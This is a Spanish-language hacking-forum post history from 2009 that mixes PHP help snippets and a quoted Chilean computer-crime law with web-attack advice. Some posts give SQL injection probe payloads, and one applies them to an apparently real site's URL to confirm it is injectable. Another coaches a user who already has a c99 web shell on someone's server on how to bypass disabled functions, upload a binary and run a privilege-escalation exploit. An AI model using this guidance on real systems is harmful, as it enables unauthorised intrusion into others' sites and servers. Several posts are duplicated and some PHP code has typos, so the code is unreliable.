Código (php) [Seleccionar]
<?php set_time_limit(0); ?>http://cl.php.net/manual/en/function.set-time-limit.php
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#3801
PHP / Re: ayuda con session
31 Agosto 2009, 06:51 AMhttp://cl.php.net/manual/en/function.set-time-limit.php
#3802
PHP / Re: Como crear un TXT y agregar INFO por el AddressBar
30 Agosto 2009, 19:14 PM
en algunas ocasiones el \n no lo interpreta bién internet explorer ya que los saltos de linea en windows son diferentes y cuando lo descargas simplemente ya no se verán asi que puedes hacer:
Código (php) [Seleccionar]
<?php
$id = preg_replace('|[^A-Za-z0-9_-.]|i', '', $_GET['activity']).'.txt';
$id2 = $_GET['od'];
if(fole_exists($id))
$master = fopen($id.'.txt', 'a');
else
$master = fopen($id.'.txt', 'x');
fwrite($master, $id2."\x0D\x0A");
fclose($master);
?>
#3803
Mensajería / Re: Si quieres saber la contraseña del msn de alguien entra aquí(Lectura Obligatoria
30 Agosto 2009, 04:55 AMCita de: skapunky en 24 Agosto 2009, 22:46 PM
(CHILE)
LEY RELATIVA A DELITOS INFORMATICOS
Ley No.:19223
Artículo 1º.- El que maliciosamente destruya o inutilice un sistema de tratamiento de información o sus partes o componentes, o impida, obstaculice o modifique su funcionamiento, sufrirá la pena de presidio menor en su grado medio a máximo.
Si como consecuencia de estas conductas se afectaren los datos contenidos en el sistema, se aplicará la pena señalada en el inciso anterior, en su grado máximo.
Artículo 2º.- El que con el ánimo de apoderarse, usar o conocer indebidamente de la información contenida en un sistema de tratamiento de la misma, lo intercepte, interfiera o acceda a él, será castigado con presidio menor en su grado mínimo a medio.
Artículo 3º.- El que maliciosamente altere, dañe o destruya los datos contenidos en un sistema de tratamiento de información, será castigado con presidio menor en su grado medio.
Artículo 4º.- El que maliciosamente revele o difunda los datos contenidos en un sistema de información, sufrirá la pena de presidio menor en su grado medio. Si quien incurre en estas conductas es el responsable del sistema de información, la pena se aumentará en un grado.".
Y por cuanto he tenido a bien aprobarlo y sancionarlo; por tanto promúlguese y llévese a efecto como Ley de la República.
Santiago, 28 de Mayo de 1993.- ENRIQUE KRAUSS RUSQUE, Vicepresidente de la República.- Francisco Cumplido Cereceda, Ministro de Justicia.
y si no tengo malas intenciones? y si quiero hacer una buena obra para su novia?
de todas formas ponerse a robar cuentas de msn eso si es perder el tiempo a lo bestia xD
#3804
PHP / Re: ayuda con session
30 Agosto 2009, 04:43 AMCódigo (php) [Seleccionar]
<?php
setcookie('Sesion', 'contenido', 9999999999);
?>
#3805
https://foro.elhacker.net/nivel_web/como_evitar_la_inyeccion_sql-t252384.0.html
Siempre siempre siempre que utilizes el envío de variables a una query mysql debes encerrarlos en comillas dobles, es tan simple como eso y si es una variable que unicamente procesa integers debes hacerlo con (int).
Siempre siempre siempre que utilizes el envío de variables a una query mysql debes encerrarlos en comillas dobles, es tan simple como eso y si es una variable que unicamente procesa integers debes hacerlo con (int).
#3806
PHP / Re: script para que se descarguen los archivos a un server??
29 Agosto 2009, 12:00 PMCódigo (php) [Seleccionar]
<?php
set_time_limit(0);
$host = 'ejemplo.com';
$archivo = 'archivo.iso';
$buffer = 'GET /'.$archivo.' HTTP/1.1
Host: host
Connection: close
';
if(!$handle = fsockopen($host, 80))
die('El servidor no responde!');
if(!fwrite($handle, $buffer))
die('Error en el servidor!');
unset($buffer);
if(!$handle2 = fopen($archivo, 'x'))
die('No tienes derechos de escritura.');
while(!feof($handle)){
fwrite($handle2, fgets($handle, 128));
}
fclose($handle);
fclose($handle2);
?>bueno ahi debes filtrar la cabezera que devuelve el servidor pero eso es lo de menos.
#3807
Desafíos - Wargames / Re: Eres un Hacker? PRUEBALO CON ESTE TEST!!!!!!
29 Agosto 2009, 01:54 AM
aaah pero si este wargame ya lo habia visto, es muy viejo, creo que el ultimo nivel sale un mapa o algo así, ya lo habia terminado.
#3808
Nivel Web / Re: SQL Injection UNION SELECT
28 Agosto 2009, 21:19 PM
Aver, este error es bastante común y muchos se hacen bastantes problemas con esto.
No es que tenga -1 o 500 columnas lo que pasa esque la inyección rompe la query y se debe al comentario "--", por lo general siempre intenta seguir las inyecciones lo mas posible sin usar comentarios ya que muchas veces las querys utilizan selecciones que son vitales para el regreso de datos, además el comentario -- para que sea válido en mysql necesita estar solo o sea --order by no sirve porque --order no existe y 2,3,4,5-- tampoco porque 5-- no existe asi que una de dos.. o haces 2,3,4,5 --+ (+ significa espacio en blanco al igual que %20) o sigues la query... -1' union all select 1,2,3,4,5,6,'7 de esta froma no rompes el código.
Comienza denuevo e intenta con:
digamos que 55 es un id de noticia válido...
php?idnoticias=55 and 1=1
php?idnoticias=55 and 1=2
php?idnoticias=55' and 1='1
php?idnoticias=55' and 1='2
php?idnoticias=55' and 1=1 --+
etc y ves que te da error y que no da error, el que no te de error esa es tu inyección.
No es que tenga -1 o 500 columnas lo que pasa esque la inyección rompe la query y se debe al comentario "--", por lo general siempre intenta seguir las inyecciones lo mas posible sin usar comentarios ya que muchas veces las querys utilizan selecciones que son vitales para el regreso de datos, además el comentario -- para que sea válido en mysql necesita estar solo o sea --order by no sirve porque --order no existe y 2,3,4,5-- tampoco porque 5-- no existe asi que una de dos.. o haces 2,3,4,5 --+ (+ significa espacio en blanco al igual que %20) o sigues la query... -1' union all select 1,2,3,4,5,6,'7 de esta froma no rompes el código.
Comienza denuevo e intenta con:
digamos que 55 es un id de noticia válido...
php?idnoticias=55 and 1=1
php?idnoticias=55 and 1=2
php?idnoticias=55' and 1='1
php?idnoticias=55' and 1='2
php?idnoticias=55' and 1=1 --+
etc y ves que te da error y que no da error, el que no te de error esa es tu inyección.
#3809
Nivel Web / Re: Inyeccion SQL, ¿es vulnerable esta web?
28 Agosto 2009, 04:23 AM
lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error.
Error:
***** index.php?op=InfoLey&idLey=6147 and 1=2
No da error:
***** index.php?op=InfoLey&idLey=6147 and 1=1
No da error
***** index.php?op=InfoLey&idLey=6147 order by 6
No da error
***** index.php?op=InfoLey&idLey=6147 order by 7
No da error
***** index.php?op=InfoLey&idLey=6147 order by 8
da error
***** index.php?op=InfoLey&idLey=6147 order by 9
Entonces es una tabla de 8 columnas que si tiene inyección sql.
Error:
***** index.php?op=InfoLey&idLey=6147 and 1=2
No da error:
***** index.php?op=InfoLey&idLey=6147 and 1=1
No da error
***** index.php?op=InfoLey&idLey=6147 order by 6
No da error
***** index.php?op=InfoLey&idLey=6147 order by 7
No da error
***** index.php?op=InfoLey&idLey=6147 order by 8
da error
***** index.php?op=InfoLey&idLey=6147 order by 9
Entonces es una tabla de 8 columnas que si tiene inyección sql.
#3810
Nivel Web / Re: problemas con permisos c99 shell
27 Agosto 2009, 23:13 PM
Si no puedes modificar permisos y tampoco ejecutar comandos lo mas seguro es que tengan restringidas las funciones y talves usen safe-mode activado. En caso contrario siempre hay formas de evadir filtros ya que hay una montonera de funciones que pueden reemplazar a system como por ejemplo popen() o proc_open().
Si quieres cambiarle el permiso a un archivo necesitas darte cuenta quien es el propietario del archivo, si estás usando la c99 te darás cuenta porque aparece el nombre, si este no corresponde al usuario de apache o www entonces estás jodido y tendrás que ver otras posibilidades.
Talves puedas revisar el directorio temporal y ver si tienes permisos de ejecución ya que por defecto deberías tener permiso de escritura en ese lugar por causa de las sesiones de php y scripts que utilizan archivos temporales, una ves ahi si el servidor está bién configurado no verás ningún archivo y te aparecerá que no puedes leer el directorio pero si puedes escribir asi que le subes de alguna manera un binario y con algún bypass de ejecución como te mostré ariba le ejecutas algún exploit para elevar privilegios dependiendo la versión del kernel que te aparece arriba en la c99 o si no le ejecutas <?php posix_uname(); ?> y con eso podrás ejecutar comandos sin restricción y modificar los permisos, etc. pero todo va dependiendo del mismo sistema de que tan seguro o bién administrado esté.
Si quieres cambiarle el permiso a un archivo necesitas darte cuenta quien es el propietario del archivo, si estás usando la c99 te darás cuenta porque aparece el nombre, si este no corresponde al usuario de apache o www entonces estás jodido y tendrás que ver otras posibilidades.
Talves puedas revisar el directorio temporal y ver si tienes permisos de ejecución ya que por defecto deberías tener permiso de escritura en ese lugar por causa de las sesiones de php y scripts que utilizan archivos temporales, una ves ahi si el servidor está bién configurado no verás ningún archivo y te aparecerá que no puedes leer el directorio pero si puedes escribir asi que le subes de alguna manera un binario y con algún bypass de ejecución como te mostré ariba le ejecutas algún exploit para elevar privilegios dependiendo la versión del kernel que te aparece arriba en la c99 o si no le ejecutas <?php posix_uname(); ?> y con eso podrás ejecutar comandos sin restricción y modificar los permisos, etc. pero todo va dependiendo del mismo sistema de que tan seguro o bién administrado esté.